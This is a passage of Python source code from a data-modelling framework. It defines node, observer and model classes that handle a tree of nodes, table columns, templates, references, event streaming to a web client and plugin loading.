def get_time_indices(self,startTime,endTime):
""" works only for the time node, it looks to find the timeField node of the table to which the node belongs
then tries to find start and end time inside the timeField column and returns the index (rownumber) which are
INSIDE the given startTime, endTime
Args:
startTime: the startTime to look up ,supported formats: epoch seconds, datetime object, iso string
endTime: the startTime to look up ,supported formats: epoch seconds, datetime object, iso string
Returns:
(numpy array) indexnumbers containing the rows of the table that fall inside the given [startTime, endTime] intervall
None for not finding table, timeField, start-endTimes whatsoever
"""
try:
startTime = date2secs(startTime)
endTime = date2secs(endTime)
times = numpy.asarray(self.get_value())
indices = numpy.where((times >= startTime) & (times <= endTime))[0]
return indices
except:
return None
def execute(self):
return self.model.execute_function(self.id)
def execute_synchronous(self):
return self.model.execute_synchronous(self.id)
def instantiate(self):
return self.model.instantiate_object(self.id)
def get_object(self):
return self.model.get_object(self.id)
def get_logger(self):
return self.model.logger
def connect_to_table(self,tableNode):
"""
connect a node to a table, it must be a column type
the node itself will be reset and filled with numpy.inf and prepared to work with the table:
an array will be created with np.inf of the current table size
and the column will be hooked to the table referencer
Returns:
True on success
"""
if self.get_property("type") != "column":
return False
#now make an array of np.inf of the current table size and apply the value
timeNode = tableNode.get_table_time_node()
if not timeNode:
return False
tableLen = len(timeNode.get_value())
self.set_value(numpy.full(tableLen,numpy.inf,dtype=numpy.float64))
#now hook it as column to the table
#check if we are part of it already
for column in tableNode.get_child("columns").get_leaves():
if column.get_id() == self.get_id():
return True
#now connect it to the table
return self.model.add_forward_refs(tableNode.get_child("columns").get_id(), [self.id],allowDuplicates=False)
def get_columns(self):
"""
get the columns nodes of a table without the time node
can be executed on the table node
Returns:
list of node objects which are the columns of the table without the time node
"""
if self.get_properties()["type"] != "table":
return None
nodes = self.get_child("columns").get_leaves()
timeNode = self.get_table_time_node()
return [node for node in self.get_child("columns").get_leaves() if node.get_id() != timeNode.get_id()]
class Observer:
# The observer needs a reference to the model, because the rest service is not able to detect
# when the client connection is closed, but the observer message handling loop can detect it
# this way the observer can detach itself from the model, when the client is disconnected
# there are two queues involved: the updateQueue holding events pushed by the observers from the model
# and the eventQueues which is the filtered updateQueue (filtering avoids sending multiple identical events in short time
def __init__(self, model):
self.model = model
# Message queues to store the new events and last time stamps
self.updateQueue = Queue()
self.eventQueues = {} # k,v = event:{"lasttimestamp":datetime,"queue":Queue()
self.minWaitTime = 0.500 #in seconds float
# use the logger of th model
self.logger = self.model.logger
self.lock = threading.RLock()
#preload queue: this is a workaround as the browser does not get the first 2 events immideately
# it actually doesn't help ..?
for i in range(2):
self.updateQueue.put({"event":"_preload","id":"","data":{"xy":str(i)}})
def update(self, event):
"""
inform about the occurrence of an event,
Args:
event "string": the
:param event:
:return:
"""
defaultEvent = {"data":"","id":"","event":""}
defaultEvent.update(event)
self.updateQueue.put(defaultEvent)
#self.logger.debug(f"Qup {id(self)} {defaultEvent['event']}, {defaultEvent['id']}")
def get_event(self):
"""
get the next event from the observerclass, this is used a generator for the webserver
we also filter out events to avoid a train of identical events
the filtering uses the self.minWaitTime, within that period we don't sent identical event;
events are "identical", if they have the same "event" and "data"
"""
self.logger.debug(f"Observer {id(self)} get_event()")
stop_event_processing = False # This flag shows when to stop the event processing
while not stop_event_processing:
try:
# Try to retrieve an item from the update queue
event = self.updateQueue.get(block=True,timeout=self.minWaitTime)
#self.logger.debug(f"event pick {event}")
#create an eventIdentification, this is used to filter out repeated events
# we select the eventIdentificton in a way that events that have unique information keeps them
# we take all information from the event.data field, so only the events WITHOUT unique data will be removed
# those are typically the tree.update events
eventIdentification = event["event"] #the event name itself
for key in event["data"]:
eventIdentification = eventIdentification+str(key)+str(event["data"][key])
#now sort this event into the queues of eventids
if eventIdentification not in self.eventQueues:
# this is a new type/identificatin of event, create an entry in the event queue
# put the event in the queue and make the last timestamp so that we send it out now
self.eventQueues[eventIdentification]={"lastTimeStamp":0,"queue":Queue()}
self.eventQueues[eventIdentification]["queue"].put(event)
except Exception as ex:
# this happens if we time out the queue get, no problem, just continue
#self.logger.error(f"Exception observer {id(self)} thread self.updateQueue.get: {ex},{str(sys.exc_info()[0])}")
pass
#now go over all the sorted event queues and check what to send out:
if 0:
#show the queues
for k,v in self.eventQueues.items():
q = v["queue"]
qLen = q.qsize()
self.logger.debug(f"Queue {k}: len {qLen} {[q.queue[id] for id in range(qLen)]}")
try:
now = time.time()
for eventIdentification,entry in self.eventQueues.items(): # entry is {"lasttimestampe": "queue":
#self.logger.debug(f"observer {id(self)} check queue of {eventIdentification} size: {entry['queue'].qsize()},last:{entry['lastTimeStamp']}, now:{now}, ready: {now > (entry['lastTimeStamp']+self.minWaitTime)}")
if (not entry["queue"].empty()) and ((now > (entry["lastTimeStamp"]+self.minWaitTime) or "system.progress" in eventIdentification)):
# for system.progress events there is not timeout, we always directly send the update
# send this event, the timeout was met, we pull the first event from the queue, trash the remaining ones
"""
old code
self.eventQueues[eventIdentification]["lastTimeStamp"]=now
#send out this event
myEvent = self.eventQueues[eventIdentification]["queue"].get()
event_string = f'id:{myEvent["id"]}\nevent: {myEvent["event"]}\ndata: {myEvent["data"]}\n\n'
self.logger.debug(f'Observer {id(self)} sending event: {event_string}')
#pull empty the queue
if self.eventQueues[eventIdentification]['queue'].qsize():
self.logger.debug(f"Qtrash observerinstance{id(self)} eventident {eventIdentification} size {self.eventQueues[eventIdentification]['queue'].qsize()}")
while not self.eventQueues[eventIdentification]["queue"].empty():
self.eventQueues[eventIdentification]["queue"].get(False)
self.logger.debug(f"Qyield {id(self)} : {myEvent}")
yield event_string
"""
self.eventQueues[eventIdentification]["lastTimeStamp"]=now
#send out this event
#pull empty the queue
if self.eventQueues[eventIdentification]['queue'].qsize():
#self.logger.debug(f"Qtrash observerinstance{id(self)} eventident {eventIdentification} size {self.eventQueues[eventIdentification]['queue'].qsize()}")
while not self.eventQueues[eventIdentification]["queue"].empty():
myEvent = self.eventQueues[eventIdentification]["queue"].get(False)
event_string = f'id:{myEvent["id"]}\nevent: {myEvent["event"]}\ndata: {json.dumps(myEvent["data"])}\n\n'
#self.logger.debug(f"Qyield {id(self)} : {myEvent}")
yield event_string
# This exception is raised when the generator function is exited, which means that the
# client side connection to the SSE stream was close, thus the observer could be removed
except GeneratorExit:
self.logger.warning(f"Observer {id(self)} connection closed.")
stop_event_processing = True
self.logger.warning(f"Observer {id(self)} exiting event processing.")
# Detach this observer from the model
self.model.detach_observer(self)
class Model:
nodeTemplate = {"id": None, "name": None, "type": "folder", "parent": None, "children": [], "backRefs": [],"forwardRefs":[],"value":None}
def __init__(self,loadPlugins=True):
"""
initialize an empty Model object, it will contain the root Node as folder with Id "0"
during the initialization, also the plug-ins (all files in the ./plugin) are loaded:
all templates and functions are imported
a model holds all modelling information and data to work on
"""
self.version = 0.1
self.model = {"1":{
"name":"root",
"type":"folder",
"children":[],
"parent":"0",
"id":"1",
"backRefs":[],
"forwardRefs":[],
"version":self.version
}}
self.disableObserverCounter = 0 # a counting sema (under manual lock) for the disabling: if zero the notify_observers is active otherwise not
self.__init_logger(logging.DEBUG)
self.globalIdCounter=1 # increased on every creation of a node, it holds the last inserted node id
self.idCreationHash = True # if this is true, we create the id per hash, not per counter
self.ts = TimeSeriesTable()
self.functions={} # a dictionary holding all functions from ./plugins
self.templates={} # holding all templates from ./plugins
self.lock = threading.RLock()
self.executeFunctionRunning = False # set to true, makes sure only one functions runs at a time
self.objectClasses = {} # a dictionaryholding all object clases from the /plugins
if loadPlugins:
self.import_default_plugins()
self.differentialHandles ={} # containing model_copy entries to support differential queries
self.diffHandleCounter = 0 # used only for debugging
self.differentialHandlesMaxPerUser = 10
self.currentModelName = "emptyModel" # the current name of the model
self.modelUpdateCounter = 0 #this is for the tree observer, on any change, we update the counter
self.observerStatus = {} # a dict holding the key = observerid and value : the needed status of an observer processing
self.executionQueue = Queue()
self.observers = []
self.sse_event_id = 1
self.start_function_execution_thread()
def __del__(self):
self.functionExecutionRunning = False # stop the execution thread of functions
def __init_logger(self, level):
"""setup the logger object"""
self.logger = logging.getLogger("Model-"+'%08x' % random.randrange(16 ** 8))
handler = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s')
handler.setFormatter(formatter)
self.logger.addHandler(handler)
logfile = RotatingFileHandler("./log/model.log", maxBytes=1000 * 1000 * 100, backupCount=10) # 10x100MB = 1GB max
logfile.setFormatter(formatter)
self.logger.addHandler(logfile)
self.logger.setLevel(level)
def __get_id(self, id):
"""
Args:
id (string): give a browsepath ("root.myfolder.myvariable") or a nodeId ("10")
or a "fancy" path mixed like "1000.min" where 1000 is a node id, only the first is allowed as Nodeid, the followings are names
Returns:
(string): the node id as string
None if not found
"""
if id in self.model:
return id
#maybe a browsepath?
try:
names = id.split('.')
if names[0]=="root":
names = names[1:]
actualSearchId = "1"
elif names[0] in self.model:
#self.logger.debug(f"fancy browsepath {names}")
actualSearchId = names[0]
names = names[1:]
else:
return None
except:
return None
#now we start at root
for name in names:
nextSearchId = None
for childId in self.model[actualSearchId]["children"]:
if self.model[childId]["name"] == name:
#this is a match
nextSearchId = childId
break
if not nextSearchId:
return None
#we found it, go deeper now
actualSearchId = nextSearchId
return actualSearchId
def get_node(self,desc):
""" instantiate a Node() object on the node given as desc
Args:
desc (string): give a browsepath ("root.myfolder.myvariable") or a nodeId ("10")
Returns:
(Node()): a node object of the given node
None if not found
"""
with self.lock:
id = self.__get_id(desc)
if id:
return Node(self,id)
def find_node(self,search,matchProperty={}):
"""
the search is a match pattern for the path, we return the first match
with
"""
with self.lock:
for id in self.model:
if search in self.get_browse_path(id):
if matchProperty!={}:
for k,v in matchProperty.items():
if k not in self.model[id]:
continue
if self.model[id][k]!=v:
continue
return Node(self,id)
return Node(self,id)
return None
def find_nodes(self,search,matchProperty={}):
"""
the search is a match pattern for the path, we return all matches as nodes
"""
found = []
with self.lock:
for id in self.model:
if search in self.get_browse_path(id):
if matchProperty!={}:
for k,v in matchProperty.items():
if k not in self.model[id]:
break
if self.model[id][k]!=v:
break
found.append(Node(self,id))
return found
def get_type(self,desc):
with self.lock:
id = self.__get_id(desc)
if not id: return None
return self.model[id]["type"]
def get_node_info(self,desc,includeLongValues=True):
"""
Args:
desc (string): give a browsepath ("root.myfolder.myvariable") or a nodeId ("10")
includeLongValue if true, we include values for columns and files
Returns:
(dict): a dictionary holding all properties of the node includin references and children
"""
with self.lock:
id = self.__get_id(desc)
if not id: return None
#we do not include values of columns and files
if self.model[id]["type"] in ["column","file","timeseries"]:
if includeLongValues:
return copy.deepcopy(self.model[id])
else:
return {k:v for k,v in self.model[id].items() if k!="value"}
elif self.model[id]["type"]== "object":
return {k: v for k, v in self.model[id].items() if k != "object"} # don't take the "object" key
else:
#take all
return copy.deepcopy(self.model[id])
def __get_node_with_children(self,id,nodes,includeForwardRefs=True):
"""
recursive helper for get_branch
"""
if self.model[id]["type"] in ["file","column","timeseries"]:
#we do not take these values
nodes[id]={k:v for k,v in self.model[id].items() if k!="value"} # copy the whole but leave out the value
elif self.model[id]["type"] == "referencer":
nodes[id] = self.model[id]
if includeForwardRefs:
#for referencers, we take the direct targets
for targetId in self.model[id]["forwardRefs"]:
if self.model[targetId]["type"] in ["file", "column","timeseries"]:
# we do not take these values
target = {k: v for k, v in self.model[id].items() if k != "value"} # copy the whole but leave out the value
else:
target = copy.deepcopy(self.model[targetId])
#xxx todo, we might take the wrong backrefs with us, also these target nodes might not have their parent here
nodes[targetId]=target
else:
nodes[id]=self.model[id]
for child in self.model[id]["children"]:
nodes.update(self.__get_node_with_children(child,nodes,includeForwardRefs))
return nodes
def get_branch(self,desc,includeRoot=True,includeForwardRefs=True):
"""
get a branch of the model starting from desc including all children excluding:
columns
files
for referencers, we do not follow deep search for leaves, we just include the first level referenced nodes
referencers poiting to nodes that are not part of the branch will also be included
Returns:
a list of nodedicts that can be used as a full valid model again
"""
with self.lock:
id = self.__get_id(desc)
if not id: return None
nodes = {}
nodes.update(self.__get_node_with_children(id,nodes,includeForwardRefs))
#now we also need all nodes to the desc
if includeRoot:
while self.model[id]["parent"]!="0":
#the parent is not invalid so take the parent, we don't make further check for files and otheres
parentId = self.model[id]["parent"]
parentNode = copy.deepcopy(self.model[parentId])
parentNode["children"]=[id] # the other side-children are not of interest
nodes.update({parentId:parentNode})
id = self.model[id]["parent"]
return copy.deepcopy(nodes)
def __get_node_with_children_pretty(self,id,depth = None,ignore = [],select={}):
"""
recursive helper for get_branch_pretty
args:
nodes: the nodes so far
select {dict}: {id:[property,property]] for the given desc we only return the given property
"""
#t=utils.Profiling(f"id {self.get_browse_path(id)}, ignore = {ignore}")
result = {}
node = self.model[id]
#create my properties
if id in select:
#special handling - we copy only some stuff
props = {k: copy.deepcopy(v) for k, v in node.items() if (k in select[id]) or (k in ["name","id"])}
else:
props = {k: copy.deepcopy(v) for k, v in node.items() if k not in ["value", "backRefs", "children", "object"]}
if node["type"] not in ["file", "column","timeseries"]:
# we also take the value then
props["value"] = copy.deepcopy(node["value"])
if node["type"] == "referencer" and (depth is None or depth>0):
#for the referencers, we take a lot of infos of the leaves as well as default, or if selected
props["targets"] = [self.get_browse_path(id) for id in self.model[id]["forwardRefs"]]
if (not (id in select)) or any(["leaves" in selectKey for selectKey in select[id]]):
leaves = self.get_leaves_ids(id)
#print(tt)
#tt.start("get leaves data")
forwards = [self.get_browse_path(leaf) for leaf in leaves]
props["leaves"]=forwards
#tt.lap("1")
props["leavesIds"]=leaves
if (not (id in select)) or ("leavesValues" in select[id]):
props["leavesValues"] = [self.get_value(id) if self.model[id]["type"] not in ["file","column","timeseries"] else None for id in leaves]
#tt.lap("2")
validation = []
if (not (id in select)) or ("leavesProperties" in select[id]) or ("leavesValidation" in select[id]):
props["leavesProperties"]={}
for id in leaves:
prop = self.get_node_info(id,includeLongValues=False)
if "validation" in prop:
validation.append(prop["validation"])
else:
validation.append(None)
props["leavesProperties"][id]=prop
props["leavesProperties"][id]["browsePath"]=self.get_browse_path(id)
#tt.lap("3")
props["leavesValidation"] = validation
#print(tt)
#make sure we have the browsepath on board
if "browsePath" not in props:
props["browsePath"]=self.get_browse_path(id)
result[".properties"]=props
if depth is None or depth>0:
#now the children
nextDepth = None
if depth is not None:
nextDepth = depth -1
for childId in node["children"]:
childPath = self.get_browse_path(childId)
if any([ignoreName in childPath for ignoreName in ignore]):
#self.logger.debug(f"ignore {childPath}")
pass
else:
result[self.model[childId]["name"]]=self.__get_node_with_children_pretty(childId,nextDepth,ignore,select)
#print(t)
return result
def get_context_menu(self,desc):
"""
get the data needed for the context menu, this is a helper for the UI
Args:
desc: the descriptor of the widget for which we want the context menu data
Returns:
all needed data to create a context menu, syntax is like get_branch_pretty
"""
with self.lock:
id = self.__get_id(desc)
if not id: return None
start = time.time()
#for the following nodes we only take one property, remove all other info
takeOnly = {"hasAnnotation.tags":["value"],
"hasAnnotation.visibleTags":["value"],
"hasAnnotation.colors":["value"],
"hasEvents.visibleEvents":["value"],
"hasEvents.colors":["value"],
"selectedVariables":["leavesIds","id"],
"contextMenuPipelines":["id","targets"],
"contextMenuFunctions" :["id","targets"],
"selectableVariables":["forwardRefs"],
"selectedVariables":["leaves","leavesIds"],
"scoreVariables":["leaves"]
}
takeOnly = {self.__get_id(id+"."+k):v for k,v in takeOnly.items()}
data = self.__get_node_with_children_pretty(id,depth=100,ignore = ["observer",
"hasAnnotation.anno",
"hasAnnotation.new",
"hasEvents.events",
".table",
"utton",
"scoreMap",
"theme",
"timeZone",
"startTime","endTime",
"bins",
"widgetType",
"hasHover",
"hasThreshold",
"hasSelection",
"width",
"height",
"controlPosition",
"hasStreaming",
"scoreMap",
"theme",
"nextNewAnnotation",
"backgroundHighlight",
"lineColors",
"hasBackground",
"backgroundMap"],
select=takeOnly)
#print("context bracnh took ",time.time()-start)
#now reduce the result further
#context menue pipelines
if "contextMenuFunctions" in data:
#remove all leaves info
deleteKeys = [key for key in data["contextMenuFunctions"][".properties"] if "leaves" in key]
for delKey in deleteKeys:
del data["contextMenuFunctions"][".properties"][delKey]
if "contextMenuPipelines" in data:
# remove all leaves info
deleteKeys = [key for key in data["contextMenuPipelines"][".properties"] if "leaves" in key]
for delKey in deleteKeys:
del data["contextMenuPipelines"][".properties"][delKey]
#print("context bracnh end ", time.time() - start)
return data
def get_branch_pretty(self,desc,depth=None,ignore = []):
"""
get a branch in the form
"child1":{"child3":... ".type":, ".value"
"child2":{
the properties occurr in ".property" style, the children are direct entries
we only use names
for the referencers, the ".forwardRefs" are the leaves with full path: ["root.folder1.tzarget2","root.varibale.bare"..]
Args:
desc [string] the root node to start from
depth [int] the depth to look into
"""
with self.lock:
#p=utils.Profiling("get_branch_pretty")
id = self.__get_id(desc)
if not id: return None
res = self.__get_node_with_children_pretty(id,depth,ignore)
#self.logger.debug(p)
return res
def get_node_with_children(self,desc):
""" retrieve node information including children of the first level
Args:
desc (string): give a browsepath ("root.myfolder.myvariable") or a nodeId ("10")
Returns:
(Node()): a node object of the given node including the browsepath
None if not found
"""
with self.lock:
id = self.__get_id(desc)
if not id: return None
response = copy.deepcopy(self.model[id])
response["browsePath"]=self.get_browse_path(id)
if response["children"]!=[]:
children =[]
for childId in response["children"]:
childInfo = copy.deepcopy(self.model[childId])
childInfo["browsePath"]=self.get_browse_path(childId)
children.append(childInfo)
response["children"]=children
return response
def get_models(self):
"""
get the available model files from the disk under /models
: Returns: a list of strings
"""
try:
mydir = myGlobalDir
os.chdir(mydir) # to enable import easily
files = os.listdir(mydir + '/models')
# take only the ones with '.json, but cut the '.model.json' extension
models = [f.split('.model')[0] for f in files if f.endswith(".json")]
return models
except Exception as ex:
self.logger.error("Model.get_models() failed "+str(ex))
return []
def get_info(self):
"""
get some information about the model
Returns: (dict) key value pairs on information of the model,
"""
return {"name":self.currentModelName}
def import_plugins_from_directory(self, plugin_directory: str, check_file_marker = True):
""" find all plugins from plugin_directory.
take from there the templates from the files and the functions
Args:
check_file_marker: if set to True, we expect a "#21datalabplugin" string in the first line
"""
if plugin_directory not in sys.path:
sys.path.append(plugin_directory) # for the importlib to find the stuff
plugin_filenames = glob.glob(os.path.join(plugin_directory, '**/*.py'), recursive=True)
for fileName in plugin_filenames:
if fileName.startswith('__'):
continue # avoid __pycache__ things
#we need to check if extra plugins have the "#21datalabplugin
if check_file_marker:
absolutePath = os.path.join(myGlobalDir,fileName)
f = open(absolutePath,"r")
firstLine = f.readline()
f.close()
if firstLine != "#21datalabplugin\n":
continue
filename_relative = os.path.relpath(fileName, plugin_directory)
moduleName = os.path.splitext(filename_relative)[0].replace(os.path.sep, '.')
self.logger.info(f"import plugin lib {moduleName}")
module = importlib.import_module(moduleName)
module = importlib.reload(module) # if we change an already imported, python uses the cache, so to make sure we always get the latest, reimport here
#now analyze all objects in the module
for objName in dir(module):
if objName.startswith('__'):
continue # these are python generated info objects, we don't want them
element = getattr(module,objName)
if type(element) is dict:
#this is a template information
self.templates[moduleName+"."+objName]=copy.deepcopy(element)
elif (inspect.isclass(element)):
newClass = {"module":module,"class":element}
self.objectClasses[moduleName + "." + objName] = newClass
elif callable(element):
#this is a function, get more info
newFunction = {"module":module, "function":element}
self.functions[moduleName+"."+objName]=newFunction
def import_default_plugins(self):
""" find all plugins (= all .py files in the ./plugin folder
take from there the templates from the files and the functions
don't check them for #21datalabplugin marker
this function is execution on startup of the model
"""
self.import_plugins_from_directory(os.path.join(myGlobalDir, 'plugins'),check_file_marker=False)
def get_id(self,ids):
""" convert a descriptor or a list into only ids (which can be used as entry to the model dictionary
Args:
ids (string, list(string)): a single or list of strings containing either and id ("101") or browsepath ("root.myfolder.myvar")
Returns:
a list(id) or id as string
"""
with self.lock:
if type(ids) == type(list()):
newList = []
for id in ids:
newList.append(self.__get_id(id))
return newList
elif type(ids) == type(dict()):
newDict = {}
for oldId in ids:
id = self.__get_id(oldId)
newDict[id]=ids[oldId] #also copy the value
return newDict
else:
#assume its scalar
return self.__get_id(ids)
def get_browse_path(self,desc):
"""
Args:
desc(string): a node id or browsepatch
Returns:
(string) a browsepath
"""
with self.lock:
id = self.get_id(desc)
if not id in self.model:
return None
path = self.model[id]["name"]
while 1:
id = self.model[id]["parent"]
if id =="0":
break
else:
path = self.model[id]["name"]+"."+path
return path
def push_nodes(self,nodeDicts):
"""
push a ready nodedict into the mode
this is a dangerous function as it does not adjust references, parent/child relations whatsoever
you must take care of that yourself
"""
for nodeDict in nodeDicts:
self.logger.warning(f"pushing node {nodeDict['id'], nodeDict['name']}")
self.model[nodeDict["id"]]=copy.deepcopy(nodeDict)
self.__notify_observers([],None) # just trigger the treeupdate for now
#xxx todo notify!
def create_node(self,parent="root",type="folder",value=None,name="newNode",properties={}):
"""
create a node inside the model by giving several infos
Args:
parent: a descriptor (browsepath or id) of the parent
type: the type of the node
value: (optional) give a value for the node
name(string): a name of the node, must be unique under the parent
properties (dict): a dictionary containing further key-values to be placed into the node as properties
Returns:
(string) nodeid,
None for problem durinf creation
"""
#check if parent exists
with self.lock:
parentId = self.get_id(parent)
if not parentId:
return None
#check if same name existst already
newpath = self.get_browse_path(parent)+"."+name
if self.get_id(newpath):
#we found it, it exists alreay, so we can't create it
return None
# we can create this node
if self.idCreationHash == True:
newId = str((random.randrange(2**64))) # a 64 bit random value
else:
self.globalIdCounter += 1
newId = str(self.globalIdCounter)
newNode = copy.deepcopy(self.nodeTemplate)
newNode.update({"id":newId,"name":name,"type":type,"parent":parentId})
if properties !={}:
newNode.update(properties)
if value != None:
newNode["value"]=value
self.model[parentId]["children"].append(newId)
self.model[newId] = newNode
if newNode["type"] == "timeseries":
if "tsAllocSize" in newNode:
allocSize = newNode["tsAllocSize"]
else:
allocSize = None
self.time_series_create(newId,allocSize = allocSize)
if newNode["type"] == "eventseries":
self.event_series_create(newId)
if newNode["type"] == "object":
if "class" not in newNode:
newNode["class"]=None
if "autoReload" not in newNode:
newNode["autoReload"] = False # set this to true means: on a "instantiate object, we reload the module
self.__notify_observers(parentId,"children")
return newNode["id"]
def create_annotation(self,nodesToCreate):
"""
special helper function to fast create an annotation with a special UI eventinfo to get all modification at once
Args:
browsePath: browsePath of new annotatino node
annoInfo [dict] k:v keys are the children, v are the value, the nodes are created as const
can also contain "targets" for referencers
Returns: the id of the created annotation
"""
try:
with self.lock:
self.disable_observers()
annoId = None
for node in nodesToCreate:
targets=[]
if "targets" in node:
targets = node["targets"]
del node["targets"]
id = self.create_node_from_path(node["browsePath"], node)
if node["type"]=="annotation":
annoId = id
if targets:
self.add_forward_refs(id,targets)
annotation = self.get_node(annoId)
infoDict = {
"id": annotation.get_id(),
"name": annotation.get_name(),
"browsePath": annotation.get_browse_path()
}
for child in annotation.get_children():
if child.get_type()=="referencer":
infoDict[child.get_name()]=[target.get_browse_path() for target in child.get_targets()]
else:
infoDict[child.get_name()] = child.get_value()
except:
self.log_error()
self.enable_observers()
if annoId:
self.notify_observers(self.model[annoId]["parent"], "children", eventInfo={"new": {annoId:infoDict},"delete":{},"modify":{}})
return annoId
def create_node_from_path(self,path,properties={"type":"variable"}):
"""
create a node from a path given, all intermediate nodes of th path given that do not yet exist are also created as folder type
Args:
path(string): the path to the node to be creates
properties(dict): the properties of the node
example:
create_node_from_path("root.myfolder.something.thisvar")
this will create myfolder as folder, something as folder, thisvar as variable and will also
set all hierarchies correctly
Returns:
(string) the nodeid created or
None if problem during creation
"""
currentNode = "root" #root
with self.lock:
for node in path.split('.')[1:-1]:
if not self.__get_id(currentNode+'.'+node):
#this one does not exist, so make it
self.create_node(currentNode,name=node)
currentNode += '.'+node
return self.create_node(parent=currentNode,name=path.split('.')[-1],properties=properties)
def create_nodes_from_template(self,parent="root",template=[]):
"""
deprecated!! this is the old style of templates as lists, now it's a dict
Create a node from a template; a template is a list of node-dicts,
Args:
parent(string): descriptor of the parent node under which the nodes of the template should be created
template: a list of node dicts of the nodes to be creates, children are allowed as dict
Returns:
(boolenan) True for created, False for error
Example:
create_nodes_from_template(parent="root.myfolder",[{"name":"myvariable1","type":"variable"},
{"name":"myfolder","type":"folder","children":[
{"name":"mysubvar","type":"variable"}]])
"""
with self.lock:
parentId = self.get_id(parent)
if not parentId:
return False
newNodeIds = [] #these must be corrected later
for node in template:
#we take all info from the nodes and insert it into the tree
nodeName = node["name"]
newNodeId = self.create_node(parentId,name=nodeName,properties=node)
newNodeIds.append(newNodeId)
#do we have "children per template syntax"?, then remove that property from the nodes and make more nodes
if "children" in self.model[newNodeId]:
savedChildren = copy.deepcopy(self.model[newNodeId]["children"])
self.model[newNodeId]["children"]=[] # empty out
for child in savedChildren:
newChildId = self.create_node(newNodeId,name=child["name"],properties=child)
newNodeIds.append(newChildId)
#now correct missing stuff
for nodeId in newNodeIds:
if self.model[nodeId]["type"]== "referencer":
# convert the path of references into an id: get the parent path, add the tail, convert to id
forwardReferences =self.model[nodeId]["forwardRefs"] #make a copy, we'll delete this
self.model[nodeId]["forwardRefs"]=[]
parentPath = self.get_browse_path(self.model[nodeId]["parent"])
for forwardRef in forwardReferences:
forwardPath = parentPath+forwardRef
self.add_forward_refs(nodeId,[forwardPath])
return True
def __create_nodes_from_path_with_children(self,parentPath,nodes):
"""
recursive helper function for create_template_from_path
e build all nodes under the parentPath on this level and then the children
we return a list of all created node ids
"""
createdNodes = []
for node in nodes:
newModelNode = {}
for k, v in node.items():
if k not in ["children", "parent", "id", "browsePath"]: # avoid stupid things
newModelNode[k] = v
newId = self.create_node_from_path(parentPath+'.'+newModelNode["name"],newModelNode)
if newId:
createdNodes.append(newId)
if "children" in node:
createdNodes.extend(self.__create_nodes_from_path_with_children(parentPath+'.'+newModelNode["name"],node["children"]))
return createdNodes
def create_template_from_path(self,path,template):
"""
Create a template from a path given, the template contains one or more nodes
the path must not yet exist!
Args:
path(string): the path under which the template will be placed. the template always contains
a root node, this will be renamed according to the path
Returns:
(boolenan) True for created, False for error
"""
with self.lock:
#first create the template root node
#we rename the template according to the path requested
template["name"]=path.split('.')[-1]
parentPath = '.'.join(path.split('.')[:-1])
newNodeIds = self.__create_nodes_from_path_with_children(parentPath,[template])
self.logger.debug(f"create_template_from_path, new nodeids: {newNodeIds}")
#now adjust the references of new nodes and of the ones that were there
for newNodeId in newNodeIds:
if "references" in self.model[newNodeId]:
#we must create forward references
for ref in self.model[newNodeId]["references"]:
# now there are two options:
# the given path is of the form templatename.levelone.leveltwo inside the template
# we replace the "templatename" with the path name the template was given
# or the path is absolute id or browsepath, then we don't modify
splitted = ref.split('.')
if len(splitted) == 1 or splitted[0]=="root":
targetPath = ref
else:
targetPath = parentPath+'.'+template['name']+'.'+'.'.join(ref.split('.')[1:])
self.add_forward_refs(newNodeId,[targetPath])
del self.model[newNodeId]["references"] # we remove the reference information from the template
def get_templates(self):
"""
give all templates loaded
Returns: a dict with entries containing the full templates
"""
with self.lock:
return copy.deepcopy(self.templates)
def add_forward_refs(self,referencerDesc,targets,allowDuplicates = True):
"""
adding forward references from a referencer to other nodes, the forward references are appended at the list
of forward references of the referencer node
references to oneself are not allowed
Args:
referenderDesc (string): descriptor of the referencer node from which we want to add forward references
targets (list(descriptors)): listof node descriptors to which we want to add forward refs
Returns:
True/False for success
"""
changed = False
with self.lock:
fromId = self.get_id(referencerDesc)
if not fromId:
self.logger.error("can't set forward ref on "+str(referencerDesc))
return False
if type(targets) is not list:
targets = [targets]
if targets==[]:
return True
if not self.model[fromId]["type"]=="referencer":
self.logger.error("can't set forward ref on "+str(referencerDesc)+ "is not type referencer, is type"+self.model[fromId]["type"])
return False
for target in targets:
toId = self.get_id(target)
if not toId:
continue
if toId == fromId:
continue
if not allowDuplicates:
if toId in self.model[fromId]["forwardRefs"]:
continue # ignore this forwards ref, we have it already
self.model[toId]["backRefs"].append(fromId)
self.model[fromId]["forwardRefs"].append(toId)
changed = True
if changed:
self.__notify_observers(fromId,"forwardRefs")
return True
def lock_model(self):
self.lock.acquire()
def release_model(self):
self.lock.release()
def get_model(self):
"""
Returns: the full deepcopy of the internal model object (list of dictionaries of the nodes)
"""
with self.lock:
#also add the browsepath to all nodes
for nodeid in self.model:
self.model[nodeid]["browsePath"]=self.get_browse_path(nodeid)
return copy.deepcopy(self.model)
def get_model_for_web(self,getHash=False):
"""
Returns: the full deepcopy of the internal model object (list of dictionaries of the nodes)
but leaving out the column values (this can be a lot of data)
and the file values (files are binary or strings with big size, typically serialized ML-models)
for files and columns, we either return a string "len 12344" or a sha1 hash value 133344
"""
model = {}
p=utils.Profiling("get_model_for_web")
with self.lock:
for nodeId, nodeDict in self.model.items():
if nodeDict["type"] in ["column","file","timeseries","eventseries"]:
# with columns we filter out the values
node = {}
for nk, nv in nodeDict.items():
if nk == "value":
try:
if not getHash:
node[nk] = "len " + str(len(nv))
else:
start = datetime.datetime.now()
hash = hashlib.sha1(nv.tobytes())
node[nk] = hash.hexdigest()
self.logger.debug(f"hashed {nodeDict['name']} in {(datetime.datetime.now()-start).total_seconds()} hash:{node[nk]}")
except:
node[nk] = "None"
else:
node[nk] = copy.deepcopy(nv) # values can be list, dict and deeper objects
model[nodeId] = node
elif nodeDict["type"]=="object":
node={k:v for k,v in nodeDict.items() if k!="object"}
model[nodeId]=node
else:
#this node is not a colum, can still hold huge data
model[nodeId] = copy.deepcopy(nodeDict) # values can be list, dict and deeper objects nodeDict
if "value" in model[nodeId]:
import numbers
try:
if isinstance(model[nodeId]["value"], numbers.Number):
if not (numpy.all(numpy.isfinite(model[nodeId]["value"]))):
model[nodeId]["value"] = None
except Exception as e:
self.logger.error(f"problem in get_model_for_web {e}")
model[nodeId]["browsePath"] = self.get_browse_path(nodeId) #also add the browsepath
#self.logger.debug(f"get model for weg took{p}")
return model
def remove_forward_refs(self,sourceDesc,targetDescriptors = [], deleteDuplicates=False):
"""
